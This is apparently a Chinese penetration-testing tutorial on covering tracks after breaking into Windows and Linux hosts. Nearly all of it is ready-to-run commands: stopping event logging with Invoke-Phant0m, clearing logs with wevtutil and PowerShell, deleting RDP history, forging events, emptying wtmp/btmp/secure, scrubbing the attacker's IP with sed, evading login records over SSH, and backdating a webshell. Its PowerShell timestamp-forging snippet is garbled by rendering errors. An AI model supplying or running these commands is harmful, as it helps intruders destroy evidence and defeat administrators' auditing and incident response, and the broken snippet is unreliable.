痕迹清除 目的，清除自己入侵目标主机的痕迹（不可能完全清除） windows默认日志文件地址 Windows日志文件默认位置是“%systemroot%\system32\config 安全日志文件：%systemroot%\system32\config \SecEvent.EVT 系统日志文件：%systemroot%\system32\config \SysEvent.EVT 应用程序日志文件：%systemroot%\system32\config \AppEvent.EVT FTP连接日志和HTTPD事务日志： %systemroot% \system32\LogFiles linux日志文件地址 /var/log/message 内核消息及各种应用程序的公共日志信息,包括启动、I/O错误、 网络错误、 /var/log/cron Crond周期性计划任务产生的时间信息 /var/log/dmesg 弓|导过程中的各种时间信息 /var/log/ maillog 进入或发出系统的电子邮件活动 /var/log/lastlog 每个用户最近的登录事件 /var/log/secure 用户认证相关的安全事件信息 /var/log/wtmp 每个用户登录注销及系统启动和停机事件 /var/log/btmp 失败的、错误的登录尝试及验证事件 主要两种方法 第一种直接停止日志记录 再进行操作 第二种，操作完成之后，删除自己的操作记录（混淆日志） 第一种，使用Invoke-Phant0m直接停止日志文件的记录 https://github.com/hlldz/Invoke-Phant0m https://github.com/QAX-A-Team/EventCleaner（可以暂停，继续，还可以删除指定日志内容） 第二种： 1.cmd方法 wevtutil el 列出系统中所有日志名称 wevtutil cl system 清理系统日志 wevtutil cl application 清理应用程序日志 wevtutil cl security 清理安全日志 2.PowerShell清除Windows事件日志

PowerShell -Command “& {Clear-Eventlog -Log Application,System,Security}”

Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname} 2.清除recent（最近操作的内容）： 或直接打开C:\Users\Administrator\Recent并删除所有内容 或在命令行中输入del /f /s /q “%userprofile%\Recent*.* 3.IIS日志 IIS默认日志路径： %SystemDrive%\inetpub\logs\LogFiles\W3SVC1 停止服务：net stop w3svc 删除日志目录下所有文件：del . 启用服务：net start w3svc 4.利用Windows自带命令进行安全擦除（文件的删除）

（1）Shift+Delete快捷键永久删除（3389连接目标主机后）

直接删除文件，还是能在回收站找到的，使用Shift+Delete快捷键可以直接永久删除了。但是用数据恢复软件，删除的文件尽快恢复，否则新的文件存入覆盖了原来的文件痕迹就很难恢复了。

（2）Cipher 命令多次覆写（防止垃圾桶文件恢复）

在删除文件后，可以利用Cipher 命令通过 /W 参数可反复写入其他数据覆盖已删除文件的硬盘空间，彻底删除数据防止被恢复。 比如，删除D:\tools目录下的文件，然后执行这条命令： cipher /w:D:\tools 这样一来，D 盘上未使用空间就会被覆盖三次：一次 0x00、一次 0xFF，一次随机数，所有被删除的文件就都不可能被恢复了。

（3）Format命令覆盖格式化（防止垃圾桶文件恢复） Format 命令加上 /P 参数后，就会把每个扇区先清零，再用随机数覆盖。而且可以覆盖多次。比如： format D: /P:8

这条命令表示把 D 盘用随机数覆盖 8 次 5.清除3389远程登录日志 清除远程桌面连接记录 当通过本机远程连接其他客户端或服务器后，会在本机存留远程桌面连接记录。 @echo off reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /f reg add “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” cd %userprofile%\documents attrib Default.rdp -s -h del Default.rdp 代码保存为clear.bat文件，cmd执行clear.bat行即可自动化清除远程桌面连接记录

6.修改文件创建时间（以pass.txt为例） （贴链接：https://cloud.tencent.com/developer/article/1805897） Function edit_time(KaTeX parse error: Expected '}', got 'EOF' at end of input: path){date1 =Get-ChildItem | Select LastWriteTime|Get-Random; d a t e 2 = G e t − C h i l d I t e m ∣ S e l e c t L a s t W r i t e T i m e ∣ G e t − R a n d o m ; date2 =Get-ChildItem | Select LastWriteTime|Get-Random; date2=Get−ChildItem∣SelectLastWriteTime∣Get−Random;date3 =Get-ChildItem | Select LastWriteTime|Get-Random;$(Get-Item p a t h ) . l a s t a c c e s s t i m e = path).lastaccesstime= path).lastaccesstime=date1.LastWriteTime; $(Get-Item p a t h ) . c r e a t i o n t i m e = path).creationtime= path).creationtime=date2.LastWriteTime ; $(Get-Item p a t h ) . l a s t w r i t e t i m e = path).lastwritetime= path).lastwritetime=date3.LastWriteTime}; edit_time(“C:\Users\saulGoodman\Desktop\工具包\pass.txt”)

7.混淆日志 使用eventcreate这个命令行工具来伪造日志或者使用自定义的大量垃圾信息覆盖现有日志。 eventcreate -l system -so administrator -t warning -d “this is a test” -id 500

8.msf清除日志方法 run event_manager -i 或者直接clearv 贴连接：https://cloud.tencent.com/developer/article/1698537

linux日志清除（主要包括修改（删除）日志文件，修改文件创建时间等） 查看历史操作命令：history history记录文件：more ~/.bash_history vim ~/.bash_history（编辑history记录文件，删除部分不想被保存的历史命令） history -c（清除当前用户的history命令记录） 当我们使用 vim时候,会在 ~/.viminfo留下操作记录，建议使用 vi ，或者在vim中使用命令关闭记录。 :set history=0 :!command 通过修改配置文件/etc/profile，使系统不再保存命令记录。 HISTSIZE=0 清除系统日志 echo > /var/log/btmp（清除登录系统失败的记录） echo > /var/log/wtmp（清除登录系统成功的记录） echo > /var/log/lastlog （清除用户最后一次登录时间） echo > /var/log/utmp（清除当前登录用户的信息） cat /dev/null > /var/log/secure（清除安全日志记录） cat /dev/null > /var/log/message（清除系统日志记录） 删除/替换部分日志 日志文件全部被清空，容易被管理员察觉了，删除或者更改部分日志可以更好地隐藏自己

删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip sed -i '/自己的ip/'d /var/log/messages

全局替换登录IP地址： sed -i ‘s/192.168.166.85/192.168.1.1/g’ secure

清除web入侵痕迹

第一种方式： 直接替换日志ip地址 sed -i ‘s/192.168.166.85/192.168.1.1/g’ access.log

第二种方式：清除部分相关日志 cat tmp.log > /var/log/nginx/access.log/

文件安全删除工具 shred 命令 安全的从硬盘上擦除数据，默认覆盖3次，通过 -n指定数据覆盖次数 shred -f -u -z -v -n 3 1.txt

dd命令 可用于安全地清除硬盘或者分区的内容。 dd if=/dev/zero of=要删除的文件 bs=大小 count=写入的次数

隐藏远程SSH登陆记录

隐身登录系统，不会被w、who、last等指令检测到。 ssh -T [email protected] /bin/bash -i

不记录ssh公钥在本地.ssh目录中 ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

隐藏文件修改时间 一般管理员会查看一个文件的修改时间，我们可以把我们的后门文件时间修改成几天之前创建的效果。使用如下命令。 touch -r A B 使B文件时间变得和A文件相同 touch -r index.html shell.php

防止日志文件被修改方式 锁定文件，只可以添加数据，不能够进行删除，更改等操作 chattr +i shell.php #锁定文件 rm -rf shell.php #提示禁止删除 lsattr shell.php #属性查看 chattr -i shell.php #解除锁定 rm -rf shell.php #删除文件 贴链接： https://cloud.tencent.com/developer/article/1897023 https://blog.csdn.net/chenzzhenguo/article/details/108880297